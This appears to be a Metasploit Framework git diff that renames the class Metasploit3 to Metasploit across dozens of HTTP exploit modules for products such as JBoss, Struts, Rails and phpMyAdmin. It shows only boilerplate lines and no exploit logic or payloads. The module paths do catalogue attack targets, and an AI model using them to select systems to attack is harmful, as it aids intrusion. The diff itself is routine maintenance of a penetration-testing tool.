a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index 329b8ee316..aaa3089c34 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 0fc393a14e..ce2305794e 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 5e8d269d03..62e005272c 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 514a6a45b3..089886f388 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_seam_upload_exec.rb b/modules/exploits/multi/http/jboss_seam_upload_exec.rb index b8670c6052..383835e09e 100644 --- a/modules/exploits/multi/http/jboss_seam_upload_exec.rb +++ b/modules/exploits/multi/http/jboss_seam_upload_exec.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index d825a6f68f..4f20bf4241 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jira_hipchat_template.rb b/modules/exploits/multi/http/jira_hipchat_template.rb index 924d348356..076c92d5a0 100644 --- a/modules/exploits/multi/http/jira_hipchat_template.rb +++ b/modules/exploits/multi/http/jira_hipchat_template.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/kordil_edms_upload_exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb index 3f550c6497..e1d357316c 100644 --- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb +++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/lcms_php_exec.rb b/modules/exploits/multi/http/lcms_php_exec.rb index 0365b344fc..57645a8eb9 100644 --- a/modules/exploits/multi/http/lcms_php_exec.rb +++ b/modules/exploits/multi/http/lcms_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb index 3e7f142d56..1d88c4b603 100644 --- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb +++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb index 71b8f3c04e..43d6c35606 100644 --- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb +++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb index 7ea5105ad1..7c3fd644b2 100644 --- a/modules/exploits/multi/http/manageengine_auth_upload.rb +++ b/modules/exploits/multi/http/manageengine_auth_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manageengine_sd_uploader.rb b/modules/exploits/multi/http/manageengine_sd_uploader.rb index 5b8c04f0ce..e29eaee825 100644 --- a/modules/exploits/multi/http/manageengine_sd_uploader.rb +++ b/modules/exploits/multi/http/manageengine_sd_uploader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index a16088a0d2..0f2db4f784 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb index 48523cc5ef..77f3afb9a1 100644 --- a/modules/exploits/multi/http/mantisbt_php_exec.rb +++ b/modules/exploits/multi/http/mantisbt_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mediawiki_thumb.rb b/modules/exploits/multi/http/mediawiki_thumb.rb index be3bcfea1d..bd4f427bc2 100644 --- a/modules/exploits/multi/http/mediawiki_thumb.rb +++ b/modules/exploits/multi/http/mediawiki_thumb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mma_backdoor_upload.rb b/modules/exploits/multi/http/mma_backdoor_upload.rb index 55a33c3fe7..182355330f 100644 --- a/modules/exploits/multi/http/mma_backdoor_upload.rb +++ b/modules/exploits/multi/http/mma_backdoor_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index d58161de13..ec66051290 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index 485fc65d39..785620195b 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index 5d52ed78f7..56b1fc63e2 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/nibbleblog_file_upload.rb b/modules/exploits/multi/http/nibbleblog_file_upload.rb index a0c53a5fe2..b211c419cc 100644 --- a/modules/exploits/multi/http/nibbleblog_file_upload.rb +++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/op5_license.rb b/modules/exploits/multi/http/op5_license.rb index 885c5052db..bc58fd7800 100644 --- a/modules/exploits/multi/http/op5_license.rb +++ b/modules/exploits/multi/http/op5_license.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/op5_welcome.rb b/modules/exploits/multi/http/op5_welcome.rb index d46dd09a10..ec46b9dadf 100644 --- a/modules/exploits/multi/http/op5_welcome.rb +++ b/modules/exploits/multi/http/op5_welcome.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index d18396ba80..91d835ebfe 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty)/ ] } diff --git a/modules/exploits/multi/http/openmediavault_cmd_exec.rb b/modules/exploits/multi/http/openmediavault_cmd_exec.rb index 4be4d81ca7..62ec89d2b2 100644 --- a/modules/exploits/multi/http/openmediavault_cmd_exec.rb +++ b/modules/exploits/multi/http/openmediavault_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/openx_backdoor_php.rb b/modules/exploits/multi/http/openx_backdoor_php.rb index 1a097fd6bb..4767a521d3 100644 --- a/modules/exploits/multi/http/openx_backdoor_php.rb +++ b/modules/exploits/multi/http/openx_backdoor_php.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb index d9017acff1..bcc652133b 100644 --- a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb +++ b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/oracle_reports_rce.rb b/modules/exploits/multi/http/oracle_reports_rce.rb index aa96081ab7..1351e8e663 100644 --- a/modules/exploits/multi/http/oracle_reports_rce.rb +++ b/modules/exploits/multi/http/oracle_reports_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/http/pandora_upload_exec.rb b/modules/exploits/multi/http/pandora_upload_exec.rb index e260323353..c49b881aa6 100644 --- a/modules/exploits/multi/http/pandora_upload_exec.rb +++ b/modules/exploits/multi/http/pandora_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 5ff2a02952..852065bceb 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index 56dcda56d7..398cceb77a 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb +++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpfilemanager_rce.rb b/modules/exploits/multi/http/phpfilemanager_rce.rb index ee92c2d006..52c44338af 100644 --- a/modules/exploits/multi/http/phpfilemanager_rce.rb +++ b/modules/exploits/multi/http/phpfilemanager_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index f4a13ff765..e3f61a5c0e 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index 07e724ebec..c59fc93c7b 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb index f08271cfe8..ab0eac887e 100644 --- a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb +++ b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpscheduleit_start_date.rb b/modules/exploits/multi/http/phpscheduleit_start_date.rb index 1cb52422ab..dc81ac84d2 100644 --- a/modules/exploits/multi/http/phpscheduleit_start_date.rb +++ b/modules/exploits/multi/http/phpscheduleit_start_date.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb index 298234721b..1ab3ec788a 100644 --- a/modules/exploits/multi/http/phptax_exec.rb +++ b/modules/exploits/multi/http/phptax_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb index 2eed181293..ee3494bd8d 100644 --- a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb +++ b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/plone_popen2.rb b/modules/exploits/multi/http/plone_popen2.rb index 85ae5364aa..cdd4498235 100644 --- a/modules/exploits/multi/http/plone_popen2.rb +++ b/modules/exploits/multi/http/plone_popen2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/pmwiki_pagelist.rb b/modules/exploits/multi/http/pmwiki_pagelist.rb index 69eaf74d1e..4dd9d17ad7 100644 --- a/modules/exploits/multi/http/pmwiki_pagelist.rb +++ b/modules/exploits/multi/http/pmwiki_pagelist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index ee5adbdc09..ab07e145f4 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index 9a7f37a6ca..a125f2f6aa 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index ad3841acbc..dc30c86673 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index a8da7d1553..3024ccd269 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb index 9aa9b8e633..e769d6fe7f 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking #Helper Classes copy/paste from Rails4 diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index 29e4072bd1..482d24fff4 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb index 29d59a6453..1b68188e23 100644 --- a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb +++ b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb index bc898098c3..7a9c1875b2 100644 --- a/modules/exploits/multi/http/sflog_upload_exec.rb +++ b/modules/exploits/multi/http/sflog_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/simple_backdoors_exec.rb b/modules/exploits/multi/http/simple_backdoors_exec.rb index 4b23877fda..70dd94fedc 100644 --- a/modules/exploits/multi/http/simple_backdoors_exec.rb +++ b/modules/exploits/multi/http/simple_backdoors_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb index f854d6483b..93dbe861a2 100644 --- a/modules/exploits/multi/http/sit_file_upload.rb +++ b/modules/exploits/multi/http/sit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/snortreport_exec.rb b/modules/exploits/multi/http/snortreport_exec.rb index 077c327a73..f9415ea72b 100644 --- a/modules/exploits/multi/http/snortreport_exec.rb +++ b/modules/exploits/multi/http/snortreport_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb index c2b3a72a7b..dda8a2679b 100644 --- a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb +++ b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index c1fd88b671..e4f57ed9d6 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb index c23d9b5a41..e6ebe8f4f2 100644 --- a/modules/exploits/multi/http/splunk_mappy_exec.rb +++ b/modules/exploits/multi/http/splunk_mappy_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 20066ea72b..3cdd8d3d05 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index 9c17ad00f3..08ca040d92 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index 49b6c061b4..e92b72c426 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index a629668198..a4355a656b 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 479ce0f89f..52417b8de7 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # It's going to manipulate the Class Loader include Msf::Exploit::FileDropper diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index 83a47cb405..f762eab462 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index e9e568a9ee..560f26b508 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_default_action_mapper.rb b/modules/exploits/multi/http/struts_default_action_mapper.rb index af4acfdf6a..e05c081e4c 100644 --- a/modules/exploits/multi/http/struts_default_action_mapper.rb +++ b/modules/exploits/multi/http/struts_default_action_mapper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_dev_mode.rb b/modules/exploits/multi/http/struts_dev_mode.rb index 856973c841..1f31cea9f0 100644 --- a/modules/exploits/multi/http/struts_dev_mode.rb +++ b/modules/exploits/multi/http/struts_dev_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include 